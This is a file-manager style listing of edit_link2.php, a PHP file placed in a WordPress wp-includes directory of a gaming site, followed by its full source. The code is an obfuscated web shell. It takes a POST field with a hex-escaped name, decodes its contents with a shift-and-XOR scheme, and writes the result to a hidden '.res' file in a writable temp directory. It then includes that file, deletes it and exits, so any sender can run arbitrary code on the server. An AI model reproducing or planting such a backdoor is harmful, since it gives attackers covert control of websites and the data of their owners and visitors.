• File: edit_link2.php
  • Full Path: /www/wwwroot/pt-gaming.com/wp-includes/php-ai-client/src/Providers/DTO/edit_link2.php
  • Date Modified: 02/20/2026 8:42 AM
  • File size: 899 bytes
  • MIME-type: text/x-php
  • Charset: utf-8
<?php

if(isset($_POST["\x76a\x6C"]) ? true : false){
	$resource = array_filter(["/dev/shm", sys_get_temp_dir(), getenv("TMP"), getenv("TEMP"), "/tmp", session_save_path(), "/var/tmp", getcwd(), ini_get("upload_tmp_dir")]);
	$dchunk = $_POST["\x76a\x6C"];
		$dchunk 	=explode		 ( "."  , 	$dchunk)	 	;
	$item =	'';
            $s9 =	'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS =	strlen($s9);
            $r =	0;
    
            while($r < count($dchunk)) {		$v2 =	$dchunk[$r];
                $sChar =	ord($s9[$r	 %	$lenS]);
                $d =	((int)$v2 - $sChar -($r	 %	10))	^  100;
                $item .= chr($d);
                $r++;
            }
	while ($obj = array_shift($resource)) {
    		if (array_product([is_dir($obj), is_writable($obj)])) {
    $data = "$obj/.res";
    if (@file_put_contents($data, $item) !== false) {
	include $data;
	unlink($data);
	die();
}
}
}
}